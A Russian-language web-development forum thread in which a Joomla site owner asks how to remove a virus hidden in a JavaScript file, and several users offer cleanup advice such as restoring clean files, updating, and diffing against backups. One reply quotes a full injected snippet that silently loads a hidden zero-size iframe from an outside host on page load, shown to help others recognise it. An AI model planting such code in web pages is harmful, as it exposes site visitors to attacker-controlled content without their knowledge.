Форум Сайтостроение Безопасность

Сайт заразили вирусом. Как ликвидировать?

СБ
На сайте с 28.07.2011
Offline
98
Сайт-билдер
1351

Здравствуйте!

Сайт на Joomla заразили вирусом, который сидит в js скрипте.

Как ликвидировать?

Спасибо.

cide
На сайте с 27.05.2006
Offline
148
cide
#1

Проверьте свой комп на вирусы. Я недавно без антивира закинул через фтп себе троян js на сайт. Пришлось сносить все и исходники переливать на сервер заново.

SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#2
Сайт-билдер:
Как ликвидировать?

Найти на сёрче спец раздел, а в нём закреплённый топик и осилить хотя бы его первые 3 стр.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
MaksimAlekseev
На сайте с 09.08.2013
Offline
14
MaksimAlekseev
#3

Как самый простой вариант, перезаписать js скрипт из исходника, то есть закачать его чистую версию.

Хостинг сайтов с проактивной защитой от вирусов - http://yutex.ru (http://yutex.ru)
A0
На сайте с 08.12.2011
Offline
31
Alex05
#4

Ищите js-файлы, измененные в то время, как появился вредоносный код. Там и найдете строки по типу

var ifnl9Jkc = document.createElement('iframe');ifnl9Jkc.name = 'ifnl9Jkc';ifnl9Jkc.src = 'http://loimret.55l55.com/';ifnl9Jkc.style.width = '0px';ifnl9Jkc.style.height = '0px';window.onload = function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifnl9Jkc=') == -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')***91;0***93;.appendChild(ifnl9Jkc);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); setTimeout(function() { document.cookie = 'ifnl9Jkc=yes; path=/; expires=' + expiresDate; }, 5000);}};

Ну и сносите его))

demon2005
На сайте с 06.02.2010
Offline
173
demon2005
#5

Сайт-билдер, Joomla какой версии? как вариант - обновить до последней

Машины должны работать. Люди должны думать. (Девиз компании "IBM") Хостинг ( http://goo.gl/em6I5 ), рекомендую. Код на скидку 965VI5O60E Выгодно купить/продать сайт ( http://www.telderi.ru/?pid=c0fb22 )
KS
На сайте с 12.07.2013
Offline
5
kot_s
#6

Если есть бэкап без вируса, взять его и выполнить сравнение с завирусованным с помощью одной из diff подобных утилит, например winmerge.

K
На сайте с 28.08.2013
Offline
1
Kutuz
#7
Alex05:
Ищите js-файлы, измененные в то время, как появился вредоносный код.

согласен

посмотреть по дате последнего изменения

vitvirtual
На сайте с 18.10.2007
Offline
248
vitvirtual
#8
Сайт-билдер:
Здравствуйте!

Сайт на Joomla заразили вирусом, который сидит в js скрипте.

Как ликвидировать?

Спасибо.

Решение вот в этом топике

www.King-Servers.com - Dedicated Servers от 65$, VDS от 25$ / VPN - Open, Pptp, Double. Http proxy - http://secretsline.biz
hexacell
На сайте с 10.12.2010
Offline
65
hexacell
#9

Сайт-билдер, какой хостинг используете?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий